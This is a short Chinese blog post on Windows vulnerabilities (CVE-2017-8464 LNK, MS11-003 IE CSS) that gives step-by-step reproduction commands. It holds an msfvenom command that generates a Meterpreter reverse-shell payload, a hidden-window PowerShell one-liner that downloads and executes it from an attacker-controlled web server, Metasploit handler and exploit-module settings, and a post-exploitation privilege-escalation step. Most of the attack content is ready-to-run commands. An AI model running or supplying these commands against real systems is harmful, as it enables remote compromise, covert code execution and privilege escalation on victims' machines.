Windows系统组件漏洞

以你之姓@ 2022-12-08 14:14 90阅读 0赞

### 目录 ###

*   *  什么是组件
     *  1.CVE-2017-8464
     *   *  原理
         *  复现
         *   *  环境部署
             *  远程监听
     *  2.MS11\_003 溢出漏洞
     *   *  原理
         *  复现
         *   *  下一步提权
     *  3.CVE-2019-0708
     *  4.CVE-2020-0796（永恒之黑）
     *  5.…………………………

## 什么是组件 ##

组件一般都是系统自带都有的， 如：`WINXP`或`WIN2000`它本身，就带有非常强大的组件功能。添加组件可以使系统的功能更加强大。  
具体方式：

控制面板--添加或删除程序--添加/删除组件

## 1.CVE-2017-8464 ##

### 原理 ###

Windows系统使用二进制解析 .LNK文件，当恶意二进制代码被系统识别执行时即可实现远程代码执行，由于是在explorer.exe进程中运行，所以 load 进内存时与当前用户具有相同权限  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center]

### 复现 ###

#### 环境部署 ####

msfvenom  -p   windows/x64/meterpreter/reverse_tcp  lhost=192.168.0.102   lport=5555  -f  psh-reflection>/opt/search.ps1   #生成shell反弹木马
    
    mv  search.ps1  /var/www/html   #木马移动到/var/www/html
    
    service apache2 start #启动服务
    
    powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.102/search.ps1');test.ps1"    #创建快捷件远程加载

#### 远程监听 ####

use exploit/multi/handler  
    
    set payload windows/x64/meterpreter/reverse_tcp  
    
    show options  
    
    set LHOST 192.168.0.102  
    
    set lport  5555    
    
    exploit

## 2.MS11\_003 溢出漏洞 ##

### 原理 ###

溢出漏洞是由于程序中的某个或某些输入函数（使用者输入参数）对所接收数据的边界验证不严密而造成。  
根据程序执行中堆栈调用原理，程序对超出边界的部分如果没有经过验证自动去掉，那么超出边界的部分就会覆盖后面的存放程序指针的数据，当执行完上面的代码，程序会自动调用指针所指向地址的命令。

### 复现 ###

search ms11_003
    use exploit/windows/browser/ms11_003_ie_css_import
    set payload windows/meterpreter/reverse_tcp
    set srvhost
    set lhost 192.168.0.102
    set uripath 00
    Run
    sessions

#### 下一步提权 ####

use  post/multi/recon/local_exploit_suggester
    set LHOST 192.168.0.102
    set SESSION 1
    Exploit

## 3.CVE-2019-0708 ##

可参考：  
[https://blog.csdn.net/yumengzth/article/details/102768945?utm\_medium=distribute.pc\_relevant.none-task-blog-title-7&spm=1001.2101.3001.4242][https_blog.csdn.net_yumengzth_article_details_102768945_utm_medium_distribute.pc_relevant.none-task-blog-title-7_spm_1001.2101.3001.4242]

## 4.CVE-2020-0796（永恒之黑） ##

[https://blog.csdn.net/PigLL/article/details/108012981][https_blog.csdn.net_PigLL_article_details_108012981]

## 5.………………………… ##

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70_pic_center]: /images/20221123/96af2e0089c74b63bfa02faeea33a0e4.png
[https_blog.csdn.net_yumengzth_article_details_102768945_utm_medium_distribute.pc_relevant.none-task-blog-title-7_spm_1001.2101.3001.4242]: https://blog.csdn.net/yumengzth/article/details/102768945?utm_medium=distribute.pc_relevant.none-task-blog-title-7&spm=1001.2101.3001.4242
[https_blog.csdn.net_PigLL_article_details_108012981]: https://blog.csdn.net/PigLL/article/details/108012981